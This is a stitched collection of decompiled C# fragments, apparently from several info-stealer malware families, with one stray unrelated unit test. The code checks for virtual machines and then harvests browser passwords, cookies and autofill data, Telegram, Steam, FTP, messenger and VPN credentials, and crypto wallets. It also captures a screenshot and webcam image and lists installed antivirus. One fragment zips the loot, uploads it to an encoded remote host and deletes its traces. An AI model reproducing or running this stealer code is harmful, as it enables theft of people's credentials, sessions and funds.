// Token: 0x060000B4 RID: 180 RVA: 0x00007BA4 File Offset: 0x00005DA4
private static void GetPasswords(ref List <PassData> list)
{
List <PassData> list2 = FileZilla.Initialise();
if (list2 != null)
{
list.AddRange(list2);
}
List <PassData> list3 = Pidgin.Initialise();
if (list3 != null)
{
list.AddRange(list3);
}
List <PassData> list4 = Mozilla.Initialise();
if (list4 != null)
{
list.AddRange(list4);
}
List <PassData> list5 = Reborn.Browsers.Chromium.Initialise();
if (list5 != null)
{
list.AddRange(list5);
}
Reborn.Cookies.Chromium.Initialise();
}
public static void Main()
{
// Проверяем на запуск виртуальных машин ( Virtual Machine Check )
if (!AntiVM.GetCheckVMBot() && !RunCheck.InstanceCheck())
{
Environment.Exit(0);
}
// Создаём папку куда будем всё собирать
HomeDirectory.Inizialize();
// Делаем проверку что папка создалась
if (CombineEx.ExistsDir(GlobalPath.HomePath))
{
// Собираем данные ....
Telega.GetSession(GlobalPath.Tdata, GlobalPath.TelegaHome, "*.*");
MailFoxPassword.Inizialize();
BuffBoard.Inizialize();
NordVPN.Inizialize_Grabber();
DynDns.Inizialize_Grabber();
FileZilla.Inizialize_Grabber();
Pidgin.Inizialize_Grabber();
GetSteamFiles.Inizialize("*.", "*.vdf", "config", "Steam");
InfoGrabber.Inizialize();
ScreenShot.Inizialize(GlobalPath.Screen);
// Сбор и вывод логинов и паролей
Searcher.CopyInSafeDir(GlobalPath.LoginsPath, "Login Data");
GetPasswords.Inizialize_Multi_file();
// Сбор и вывод куки данных
Searcher.CopyInSafeDir(GlobalPath.CookiesPath, "Cookies");
GetCookies.Inizialize();
// Сбор и вывод Автозаполнение форм
Searcher.CopyInSafeDir(GlobalPath.WebDataPath, "Web Data");
GetAutoFill.Inizialize_AutoFill();
}
}
public bool Start(string[] Params)
{
Information.Start();
ProcList.Parse();
Thread.Sleep(new Random().Next(1, 5) * 100);
if (Base64.Decode(Params[2]) == "1")
{
clipper.Start();
}
Action action = delegate
{
CBoard.Start();
};
try
{
if (base.InvokeRequired)
{
Invoke(action);
}
else
{
action();
}
}
catch
{
}
DesktopImg.Start();
DFiles.Start();
WebCam.Start();
FZ.Start();
Pidgin.Start();
DS.Start();
TG.Start();
Skype.Start();
Steam.Start();
BTCQt.Start();
BTCByte.Start();
BTCDASH.Start();
BTCETH.Start();
BTCMON.Start();
Thread.Sleep(new Random().Next(1, 5) * 1000);
EGChromeC.Start();
string text = null;
text = $"{Buffer.path_ad}{GetRandom.String(null, 8)}";
if (File.Exists(text))
{
File.Delete(text);
}
ZipFile.CreateFromDirectory(Buffer.path_l, text);
try
{
if (!EntryPoint.activation)
{
Environment.FailFast("Program has been crashed");
}
using (WebClient webClient = new WebClient())
{
NameValueCollection nameValueCollection = new NameValueCollection();
nameValueCollection.Add("_x_key_x_", Base64.Encode(EntryPoint.key));
nameValueCollection.Add("zipx", Base64.Encode(File.ReadAllText(text, Encoding.GetEncoding(1251)), Encoding.GetEncoding(1251)));
nameValueCollection.Add("desktop", Base64.Encode(File.ReadAllText($"{Buffer.path_l}ScreenShot.png", Encoding.GetEncoding(1251)), Encoding.GetEncoding(1251)));
nameValueCollection.Add("webcam", Base64.Encode(File.ReadAllText($"{Buffer.path_l}WebCam.jpg", Encoding.GetEncoding(1251)), Encoding.GetEncoding(1251)));
nameValueCollection.Add("email", Params[0]);
nameValueCollection.Add("caption", Exporter.Export("<title>", "</title>", Starter.FileData));
nameValueCollection.Add("username", Base64.Encode(Environment.UserName));
nameValueCollection.Add("c_count", Base64.Encode(Buffer.XBufferData[0]));
nameValueCollection.Add("pcount", Base64.Encode(Buffer.XBufferData[1]));
nameValueCollection.Add("acount", Base64.Encode(Buffer.XBufferData[10]));
nameValueCollection.Add("cd_count", Base64.Encode(Buffer.XBufferData[11]));
nameValueCollection.Add("steam", Base64.Encode(Buffer.XBufferData[6]));
nameValueCollection.Add("fzilla", Base64.Encode(Buffer.XBufferData[2]));
nameValueCollection.Add("tg", Base64.Encode(Buffer.XBufferData[3]));
nameValueCollection.Add("dcord", Base64.Encode(Buffer.XBufferData[4]));
nameValueCollection.Add("skype", Base64.Encode(Buffer.XBufferData[5]));
nameValueCollection.Add("b-core", Base64.Encode(Buffer.XBufferData[7]));
nameValueCollection.Add("b-byte", Base64.Encode(Buffer.XBufferData[13]));
nameValueCollection.Add("b-d", Base64.Encode(Buffer.XBufferData[14]));
nameValueCollection.Add("b-ethe", Base64.Encode(Buffer.XBufferData[15]));
nameValueCollection.Add("b-mon", Base64.Encode(Buffer.XBufferData[16]));
nameValueCollection.Add("avinstall", Base64.Encode(Buffer.XBufferData[18]));
nameValueCollection.Add("_version_", Base64.Encode("3200"));
while (true)
{
try
{
if (Encoding.Default.GetString(webClient.UploadValues(string.Format("http://{0}", Base64.Decode(string.Format("{0}{1}{2}", Buffer.Sender, Buffer.Handler, "="))), nameValueCollection)) == "good")
{
goto IL_040a;
}
}
catch
{
}
Thread.Sleep(2000);
}
}
}
catch
{
}
goto IL_040a;
IL_040a:
try
{
Directory.Delete(Buffer.path_l, recursive: true);
}
catch
{
}
try
{
File.Delete(text);
}
catch
{
}
return(true);
}
public static Credentials Create(ClientSettings settings)
{
Credentials credentials = new Credentials()
{
Browsers = (IList <Browser>) new List <Browser>(),
Files = (IList <RemoteFile>) new List <RemoteFile>(),
FtpConnections = (IList <LoginPair>) new List <LoginPair>(),
Hardwares = (IList <Hardware>) new List <Hardware>(),
InstalledBrowsers = (IList <InstalledBrowserInfo>) new List <InstalledBrowserInfo>(),
InstalledSoftwares = (IList <string>) new List <string>(),
Languages = (IList <string>) new List <string>(),
Processes = (IList <string>) new List <string>(),
Defenders = (IList <string>) new List <string>()
};
try
{
WmiService wmiService = new WmiService();
try
{
ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>((WmiQueryBase) new WmiProcessorQuery(), (ManagementObjectSearcher)null);
credentials.Hardwares = (IList <Hardware>)source.Select <WmiProcessor, Hardware>((Func <WmiProcessor, Hardware>)(x => new Hardware()
{
Caption = x.Name,
HardType = HardwareType.Processor,
Parameter = string.Format("{0}", (object)x.NumberOfCores)
})).ToList <Hardware>();
}
catch
{
}
try
{
if (credentials.Hardwares == null)
{
credentials.Hardwares = (IList <Hardware>) new List <Hardware>();
}
foreach (Hardware hardware in wmiService.QueryAll <WmiGraphicCard>((WmiQueryBase) new WmiGraphicCardQuery(), (ManagementObjectSearcher)null).Where <WmiGraphicCard>((Func <WmiGraphicCard, bool>)(x => x.AdapterRAM > 0U)).Select <WmiGraphicCard, Hardware>((Func <WmiGraphicCard, Hardware>)(x => new Hardware()
{
Caption = x.Name,
HardType = HardwareType.Graphic,
Parameter = string.Format("{0}", (object)x.AdapterRAM)
})).ToList <Hardware>())
{
credentials.Hardwares.Add(hardware);
}
}
catch
{
}
try
{
List <WmiQueryBase> wmiQueryBaseList = new List <WmiQueryBase>()
{
(WmiQueryBase) new WmiAntivirusQuery(),
(WmiQueryBase) new WmiAntiSpyWareQuery(),
(WmiQueryBase) new WmiFirewallQuery()
};
string[] strArray = new string[2]
{
"ROOT\\SecurityCenter2",
"ROOT\\SecurityCenter"
};
List <WmiAntivirus> source = new List <WmiAntivirus>();
foreach (WmiQueryBase wmiQuery in wmiQueryBaseList)
{
foreach (string scope in strArray)
{
try
{
source.AddRange((IEnumerable <WmiAntivirus>)wmiService.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>());
}
catch
{
}
}
}
credentials.Defenders = (IList <string>)source.Select <WmiAntivirus, string>((Func <WmiAntivirus, string>)(x => x.DisplayName)).Distinct <string>().ToList <string>();
}
catch
{
}
credentials.InstalledBrowsers = (IList <InstalledBrowserInfo>)UserInfoHelper.GetBrowsers();
credentials.Processes = (IList <string>)UserInfoHelper.ListOfProcesses();
credentials.InstalledSoftwares = (IList <string>)UserInfoHelper.ListOfPrograms();
credentials.Languages = (IList <string>)UserInfoHelper.AvailableLanguages();
if (settings.GrabBrowsers)
{
List <Browser> browserList = new List <Browser>();
browserList.AddRange((IEnumerable <Browser>)ChromiumEngine.ParseBrowsers());
browserList.AddRange((IEnumerable <Browser>)GeckoEngine.ParseBrowsers());
browserList.Add(EdgeEngine.ParseBrowsers());
foreach (Browser browser in browserList)
{
if (!browser.IsEmpty())
{
credentials.Browsers.Add(browser);
}
}
}
if (settings.GrabFiles)
{
credentials.Files = RemoteFileGrabber.ParseFiles((IEnumerable <string>)settings.GrabPaths);
}
if (settings.GrabFTP)
{
List <LoginPair> loginPairList = new List <LoginPair>();
loginPairList.AddRange((IEnumerable <LoginPair>)FileZilla.ParseConnections());
loginPairList.AddRange((IEnumerable <LoginPair>)WinSCP.ParseConnections());
credentials.FtpConnections = (IList <LoginPair>)loginPairList;
}
if (settings.GrabImClients)
{
foreach (LoginPair connection in Pidgin.ParseConnections())
{
credentials.FtpConnections.Add(connection);
}
}
}
catch
{
}
return(credentials);
}
public void Test_implementsSearchForNewer()
{
var p = new Pidgin(false);
Assert.IsTrue(p.implementsSearchForNewer());
}
// Token: 0x0600004F RID: 79 RVA: 0x000028BC File Offset: 0x00000ABC
public static Credentials Create(ClientSettings settings)
{
Credentials credentials = new Credentials
{
Defenders = new List <string>(),
Browsers = new List <Browser>(),
Files = new List <RemoteFile>(),
FtpConnections = new List <LoginPair>(),
Hardwares = new List <Hardware>(),
InstalledBrowsers = new List <InstalledBrowserInfo>(),
InstalledSoftwares = new List <string>(),
Languages = new List <string>(),
Processes = new List <string>(),
ColdWallets = new List <ColdWallet>(),
ImportantAutofills = new List <Autofill>(),
SteamFiles = new List <RemoteFile>(),
NordVPN = new List <LoginPair>(),
OpenVPN = new List <RemoteFile>(),
ProtonVPN = new List <RemoteFile>(),
TelegramFiles = new List <RemoteFile>()
};
try
{
try
{
ReadOnlyCollection <WmiProcessor> source = new WmiService().QueryAll <WmiProcessor>(new WmiProcessorQuery(), null);
credentials.Hardwares = (from x in source
select new Hardware
{
Caption = x.Name,
HardType = HardwareType.Processor,
Parameter = string.Format("{0}", x.NumberOfCores)
}).ToList <Hardware>();
}
catch
{
}
try
{
WmiService wmiService = new WmiService();
if (credentials.Hardwares == null)
{
credentials.Hardwares = new List <Hardware>();
}
foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery(), null)
where x.AdapterRAM > 0U
select new Hardware
{
Caption = x.Name,
HardType = HardwareType.Graphic,
Parameter = string.Format("{0}", x.AdapterRAM)
}).ToList <Hardware>())
{
credentials.Hardwares.Add(item);
}
}
catch
{
}
try
{
credentials.Hardwares.Add(new Hardware
{
Caption = "Total of RAM",
HardType = HardwareType.Graphic,
Parameter = UserInfoHelper.TotalOfRAM()
});
}
catch
{
}
try
{
WmiService wmiService2 = new WmiService();
List <WmiQueryBase> list = new List <WmiQueryBase>
{
new WmiAntivirusQuery(),
new WmiAntiSpyWareQuery(),
new WmiFirewallQuery()
};
string[] array = new string[]
{
"ROOT\\SecurityCenter2",
"ROOT\\SecurityCenter"
};
List <WmiAntivirus> list2 = new List <WmiAntivirus>();
foreach (WmiQueryBase wmiQuery in list)
{
foreach (string scope in array)
{
try
{
list2.AddRange(wmiService2.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>());
}
catch
{
}
}
}
credentials.Defenders = (from x in list2
select x.DisplayName).Distinct <string>().ToList <string>();
}
catch
{
}
credentials.InstalledBrowsers = UserInfoHelper.GetBrowsers();
credentials.Processes = UserInfoHelper.ListOfProcesses();
credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms();
credentials.Languages = UserInfoHelper.AvailableLanguages();
if (settings.GrabTelegram)
{
credentials.TelegramFiles.AddRange(TelegramGrabber.ParseFiles());
}
if (settings.GrabVPN)
{
credentials.NordVPN.AddRange(NordVPN.GetProfile());
credentials.OpenVPN.AddRange(OpenVPN.ParseFiles());
credentials.ProtonVPN.AddRange(ProtonVPN.ParseFiles());
}
if (settings.GrabSteam)
{
credentials.SteamFiles.AddRange(SteamGrabber.ParseFiles());
}
if (settings.GrabBrowsers)
{
List <Browser> list3 = new List <Browser>();
if (settings.PortablePaths == null)
{
settings.PortablePaths = new List <string>();
}
settings.PortablePaths.Add(Constants.RoamingAppData);
settings.PortablePaths.Add(Constants.LocalAppData);
List <string> list4 = new List <string>();
List <string> list5 = new List <string>();
foreach (string text in Constants.chromiumBrowserPaths)
{
string text2 = string.Empty;
if (text.Contains("Opera"))
{
text2 = Constants.RoamingAppData + text;
}
else
{
text2 = Constants.LocalAppData + text;
}
if (Directory.Exists(text2))
{
foreach (string text3 in DecryptHelper.FindPaths(text2, 1, 1, new string[]
{
"Login Data",
"Web Data",
"Cookies"
}))
{
if ((text3.EndsWith("Login Data") || text3.EndsWith("Web Data") || text3.EndsWith("Cookies")) && !list4.Contains(text3))
{
list4.Add(text3);
}
}
}
}
foreach (string str in Constants.geckoBrowserPaths)
{
try
{
string text4 = Constants.RoamingAppData + str;
if (Directory.Exists(text4))
{
foreach (string text5 in DecryptHelper.FindPaths(text4, 2, 1, new string[]
{
"key3.db",
"key4.db",
"cookies.sqlite",
"logins.json"
}))
{
if ((text5.EndsWith("key3.db") || text5.EndsWith("key4.db") || text5.EndsWith("cookies.sqlite") || text5.EndsWith("logins.json")) && !list5.Contains(text5))
{
list5.Add(text5);
}
}
}
}
catch
{
}
}
list3.AddRange(ChromiumEngine.ParseBrowsers(list4));
list3.AddRange(GeckoEngine.ParseBrowsers(list5));
foreach (Browser browser in list3)
{
if (!browser.IsEmpty())
{
using (List <Autofill> .Enumerator enumerator6 = CredentialsHelper.FindImportant(browser.Autofills).GetEnumerator())
{
while (enumerator6.MoveNext())
{
Autofill autofill = enumerator6.Current;
if (!credentials.ImportantAutofills.Any((Autofill x) => x.Name == autofill.Name && x.Value == autofill.Value))
{
credentials.ImportantAutofills.Add(autofill);
}
}
}
credentials.Browsers.Add(browser);
}
}
}
if (settings.GrabWallets)
{
List <ColdWallet> list6 = new List <ColdWallet>();
list6.AddRange(ColdWalletsGrabber.ParseFiles());
foreach (ColdWallet item2 in list6)
{
credentials.ColdWallets.Add(item2);
}
}
if (settings.GrabFiles)
{
credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths, null);
}
if (settings.GrabFTP)
{
List <LoginPair> list7 = new List <LoginPair>();
list7.AddRange(FileZilla.ParseConnections());
list7.AddRange(WinSCP.ParseConnections());
credentials.FtpConnections = list7;
}
if (settings.GrabImClients)
{
foreach (LoginPair item3 in Pidgin.ParseConnections())
{
credentials.FtpConnections.Add(item3);
}
}
}
catch (Exception)
{
}
return(credentials);
}
public static Credentials Create(ClientSettings settings)
{
Credentials credentials = new Credentials
{
Browsers = new List <Browser>(),
Files = new List <RemoteFile>(),
FtpConnections = new List <LoginPair>(),
Hardwares = new List <Hardware>(),
InstalledBrowsers = new List <InstalledBrowserInfo>(),
InstalledSoftwares = new List <string>(),
Languages = new List <string>(),
Processes = new List <string>(),
Defenders = new List <string>()
};
try
{
WmiService wmiService = new WmiService();
try
{
ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>(new WmiProcessorQuery());
credentials.Hardwares = source.Select((WmiProcessor x) => new Hardware
{
Caption = x.Name,
HardType = HardwareType.Processor,
Parameter = $"{x.NumberOfCores}"
}).ToList();
}
catch
{
}
try
{
if (credentials.Hardwares == null)
{
credentials.Hardwares = new List <Hardware>();
}
foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery())
where x.AdapterRAM != 0
select new Hardware
{
Caption = x.Name,
HardType = HardwareType.Graphic,
Parameter = $"{x.AdapterRAM}"
}).ToList())
{
credentials.Hardwares.Add(item);
}
}
catch
{
}
try
{
List <WmiQueryBase> list = new List <WmiQueryBase>
{
new WmiAntivirusQuery(),
new WmiAntiSpyWareQuery(),
new WmiFirewallQuery()
};
string[] array = new string[2]
{
"ROOT\\SecurityCenter2",
"ROOT\\SecurityCenter"
};
List <WmiAntivirus> list2 = new List <WmiAntivirus>();
foreach (WmiQueryBase item2 in list)
{
string[] array2 = array;
foreach (string scope in array2)
{
try
{
list2.AddRange(wmiService.QueryAll <WmiAntivirus>(item2, new ManagementObjectSearcher(scope, string.Empty)).ToList());
}
catch
{
}
}
}
credentials.Defenders = list2.Select((WmiAntivirus x) => x.DisplayName).Distinct().ToList();
}
catch
{
}
credentials.InstalledBrowsers = UserInfoHelper.GetBrowsers();
credentials.Processes = UserInfoHelper.ListOfProcesses();
credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms();
credentials.Languages = UserInfoHelper.AvailableLanguages();
if (settings.GrabBrowsers)
{
List <Browser> list3 = new List <Browser>();
list3.AddRange(ChromiumEngine.ParseBrowsers());
list3.AddRange(GeckoEngine.ParseBrowsers());
list3.Add(EdgeEngine.ParseBrowsers());
foreach (Browser item3 in list3)
{
if (!item3.IsEmpty())
{
credentials.Browsers.Add(item3);
}
}
}
if (settings.GrabFiles)
{
credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths);
}
if (settings.GrabFTP)
{
List <LoginPair> list4 = new List <LoginPair>();
list4.AddRange(FileZilla.ParseConnections());
list4.AddRange(WinSCP.ParseConnections());
credentials.FtpConnections = list4;
}
if (settings.GrabImClients)
{
foreach (LoginPair item4 in Pidgin.ParseConnections())
{
credentials.FtpConnections.Add(item4);
}
return(credentials);
}
return(credentials);
}
catch
{
return(credentials);
}
}